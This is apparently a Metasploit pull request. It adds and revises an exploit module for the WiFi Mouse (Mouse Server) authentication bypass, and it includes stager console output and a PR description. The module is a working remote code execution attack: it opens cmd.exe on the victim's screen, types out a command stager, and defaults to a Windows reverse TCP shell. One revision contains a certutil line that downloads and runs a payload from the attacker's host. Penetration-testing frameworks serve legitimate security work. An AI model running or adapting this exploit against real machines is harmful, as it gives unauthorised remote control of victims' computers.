-[*] 2.2.2.2:1978 - Command Stager progress -  44.49% done (44836/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  45.50% done (45855/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  46.51% done (46874/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  47.52% done (47893/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  48.54% done (48912/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  49.55% done (49931/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  50.56% done (50950/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  51.57% done (51969/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  52.58% done (52988/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  53.59% done (54007/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  54.60% done (55026/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  55.61% done (56045/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  56.62% done (57064/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  57.64% done (58083/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  58.65% done (59102/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  59.66% done (60121/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  60.67% done (61140/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  61.68% done (62159/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  62.69% done (63178/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  63.70% done (64197/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  64.71% done (65216/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  65.72% done (66235/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  66.74% done (67254/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  67.75% done (68273/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  68.76% done (69292/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  69.77% done (70311/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  70.78% done (71330/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  71.79% done (72349/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  72.80% done (73368/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  73.81% done (74387/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  74.83% done (75406/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  75.84% done (76425/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  76.85% done (77444/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  77.86% done (78463/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  78.87% done (79482/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  79.88% done (80501/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  80.89% done (81520/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  81.90% done (82539/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  82.91% done (83558/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  83.93% done (84577/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  84.94% done (85596/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  85.95% done (86615/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  86.96% done (87634/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  87.97% done (88653/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  88.98% done (89672/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  89.99% done (90691/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  91.00% done (91710/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  92.01% done (92729/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  93.03% done (93748/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  94.04% done (94767/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  95.05% done (95786/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  96.06% done (96805/100776 bytes)
-[*] 2.2.2.2:1978 - Command Stager progress -  97.07% done (97824/100776 bytes)
+...
 [*] 2.2.2.2:1978 - Command Stager progress -  98.08% done (98843/100776 bytes)
 [*] 2.2.2.2:1978 - Command Stager progress -  99.09% done (99862/100776 bytes)
 [*] Encoded stage with x86/shikata_ga_nai

--- a/modules/exploits/windows/misc/wifi_mouse_rce.rb
+++ b/modules/exploits/windows/misc/wifi_mouse_rce.rb
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
           (cmd.exe in our case) and type commands that will be executed as the user running
           WiFi Mouse (Mouse Server), resulting in remote code execution.
 
-          Tested again st versions 1.8.3.4 (current as of module writing) and
+          Tested against versions 1.8.3.4 (current as of module writing) and
           1.8.2.3.
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/windows/misc/wifi_mouse_rce.rb
+++ b/modules/exploits/windows/misc/wifi_mouse_rce.rb
@@ -18,15 +18,15 @@ class MetasploitModule < Msf::Exploit::Remote
           The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
           authentication is completely implemented client side.  Then it is possible
           to open a program on the server (cmd.exe in our case) and type commands
-          resulting in an RCE.  While commands are being typed, any user interaction
-          will most likely break the payload staging process.
-          Versions 1.8.2.3 and before are vulnerable.
+          resulting in an RCE.
+          Tested again st versions 1.8.3.4 (current as of module writing) and
+          1.8.2.3.
         },
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die', # msf module
           'REDHATAUGUST', # edb
-          'H4RK3NZ0' # edb
+          'H4RK3NZ0' # edb, original discovery
         ],
         'References' => [
           [ 'EDB', '50972' ],

--- a/modules/exploits/windows/misc/wifi_mouse_rce.rb
+++ b/modules/exploits/windows/misc/wifi_mouse_rce.rb
@@ -16,9 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Wifi Mouse RCE',
         'Description' => %q{
           The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
-          authentication is completely implemented client side.  Then it is possible
-          to open a program on the server (cmd.exe in our case) and type commands
-          resulting in an RCE.
+          authentication is completely implemented entirely on the client side. By utilizing
+          this vulnerability, is possible to open a program on the server
+          (cmd.exe in our case) and type commands that will be executed as the user running
+          WiFi Mouse (Mouse Server), resulting in remote code execution.
+
           Tested again st versions 1.8.3.4 (current as of module writing) and
           1.8.2.3.
         },
@@ -63,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options(
       [
-        OptPort.new('RPORT', [true, 'Port WiFi Mouse runs on', 1978]),
+        OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),
         OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
         OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method.  Smaller for more unstable connections.', 1_020]),
       ]

--- a/modules/exploits/windows/misc/wifi_mouse_rce.rb
+++ b/modules/exploits/windows/misc/wifi_mouse_rce.rb
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'EDB', '50972' ],
           [ 'EDB', '49601' ],
+          [ 'CVE', '2022-3218' ],
           [ 'URL', 'http://wifimouse.necta.us/' ],
           [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]
         ],

--- a/modules/exploits/windows/misc/wifi_mouse_rce.rb
+++ b/modules/exploits/windows/misc/wifi_mouse_rce.rb
@@ -1,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wifi Mouse RCE',
+        'Description' => %q{
+          The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
+          authentication is completely implemented client side.  Then it is possible
+          to open a program on the server (cmd.exe in our case) and type commands
+          resulting in an RCE.  While commands are being typed, any user interaction
+          will most likely break the payload staging process.
+          Versions 1.8.2.3 and before are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'REDHATAUGUST', # edb
+          'H4RK3NZ0' # edb
+        ],
+        'References' => [
+          [ 'EDB', '50972' ],
+          [ 'EDB', '49601' ],
+          [ 'URL', 'http://wifimouse.necta.us/' ],
+          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]
+        ],
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'stager',
+            {
+              'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
+            }
+          ],
+          ['pull', {}],
+        ],
+        'Payload' => {
+          'BadChars' => "\x0a\x00"
+        },
+        'DefaultOptions' => {
+          # since this may get typed out ON SCREEN we want as small a payload as possible
+          'PAYLOAD' => 'windows/shell/reverse_tcp'
+        },
+        'DisclosureDate' => '2021-02-25',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
+        }
+      )
+    )
+    register_options(
+      [
+        OptPort.new('RPORT', [true, 'Port WiFi Mouse runs on', 1978]),
+        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
+        OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method.  Smaller for more unstable connections.', 1_020]),
+        OptString.new('PATH', [true, 'where to stage payload for pull method.', 'c:\\Windows\\Temp\\'])
+      ]
+    )
+  end
+
+  def send_return
+    sock.put('key  3RTN') # what the mobile app sends
+  end
+
+  def send_command(command)
+    sock.put("utf8 #{command}\x0A")
+    sleep(datastore['SLEEP'])
+    send_return
+  end
+
+  def open_file(file)
+    file = "/#{file}".gsub('\\', '/').gsub(':', '')
+    sock.put("openfile #{file}\x0A")
+  end
+
+  def on_request_uri(cli, _req)
+    p = generate_payload_exe
+    send_response(cli, p)
+    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
+  end
+
+  def exploit
+    connect
+    print_status('Opening command prompt')
+    open_file('C:\\Windows\\System32\\cmd.exe')
+    sleep(datastore['SLEEP']) # give time for it to open
+    print_status('Typing out payload')
+    if target.name == 'stager'
+      execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })
+    elsif target.name == 'pull'
+      # this method was in the original edb exploit, this is significantly faster
+      # and speed is of the essence since remote user input most likely breaks this module
+      start_service('Path' => '/') # start webserver
+
+      filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
+      send_command("certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{datastore['path']}#{filename} && exit")
+      path_to_execute = "#{datastore['path']}#{filename}"
+      sleep(datastore['SLEEP'] * 2) # give time for it to save
+
+      # now that our payload is on host, just open it directly
+      print_status('Attempting to open payload')
+      open_file(path_to_execute)
+    end
+    handler
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_command(cmd)
+  end
+end

--- a/modules/exploits/windows/misc/wifi_mouse_rce.rb
+++ b/modules/exploits/windows/misc/wifi_mouse_rce.rb
@@ -41,10 +41,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'stager',
             {
-              'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
+              'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']
             }
           ],
-          ['pull', {}],
         ],
         'Payload' => {
           'BadChars' => "\x0a\x00"
@@ -54,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'PAYLOAD' => 'windows/shell/reverse_tcp'
         },
         'DisclosureDate' => '2021-02-25',
-        'DefaultTarget' => 1,
+        'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [CRASH_SERVICE_DOWN],
@@ -98,23 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Opening command prompt')
     open_file('C:\\Windows\\System32\\cmd.exe')
     sleep(datastore['SLEEP']) # give time for it to open
+
     print_status('Typing out payload')
-    if target.name == 'stager'
-      execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })
-    elsif target.name == 'pull'
-      # this method was in the original edb exploit, this is significantly faster
-      # and speed is of the essence since remote user input most likely breaks this module
-      start_service('Path' => '/') # start webserver
+    execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })
 
-      filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
-      send_command("certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{datastore['path']}#{filename} && exit")
-      path_to_execute = "#{datastore['path']}#{filename}"
-      sleep(datastore['SLEEP'] * 2) # give time for it to save
-
-      # now that our payload is on host, just open it directly
-      print_status('Attempting to open payload')
-      open_file(path_to_execute)
-    end
     handler
   end
 

--- a/modules/exploits/windows/misc/wifi_mouse_rce.rb
+++ b/modules/exploits/windows/misc/wifi_mouse_rce.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Exploit::Remote::Tcp
   include Msf::Exploit::CmdStager
-  include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
     super(
@@ -66,7 +65,6 @@ class MetasploitModule < Msf::Exploit::Remote
         OptPort.new('RPORT', [true, 'Port WiFi Mouse runs on', 1978]),
         OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
         OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method.  Smaller for more unstable connections.', 1_020]),
-        OptString.new('PATH', [true, 'where to stage payload for pull method.', 'c:\\Windows\\Temp\\'])
       ]
     )
   end
@@ -84,12 +82,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def open_file(file)
     file = "/#{file}".gsub('\\', '/').gsub(':', '')
     sock.put("openfile #{file}\x0A")
-  end
-
-  def on_request_uri(cli, _req)
-    p = generate_payload_exe
-    send_response(cli, p)
-    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
   end
 
   def exploit


### PR DESCRIPTION
This PR adds a new module to exploit an auth bypass to rce in 'wifi mouse'.

@H4rk3nz0 looks like you were the original author (and your twitter is gone), did you ever reach out to the company to responsibly disclose?

This is a neat exploit as you connect to the server, ask it to open cmd, then type out what you want on the user's screen. its fun to watch shell code :).  

There is 1 target: stager which has 2 cmdstagers:

1. `psh_invokewebrequest` (default) this one types the command and pulls back the payload nice and fast.  You should use it in almost all circumstances
2. `certutil`  it appearing on the user's screen, its unreliable (needs ~3.5min of solitude).  If the user types anything or moves the focus to another window, exploit will fail. 

## Verification

- [x] install and start software. i tried it on the one linked in EDB and the most recent one on the website
- [x] Start `msfconsole`
- [x] `use exploit/windows/misc/wifi_mouse_rce`
- [x] Set `rhost` and `lhost` as required.
- [x] `run`
- [x] **Verify** it works via both methods (targets)
- [x] **Document** looks good
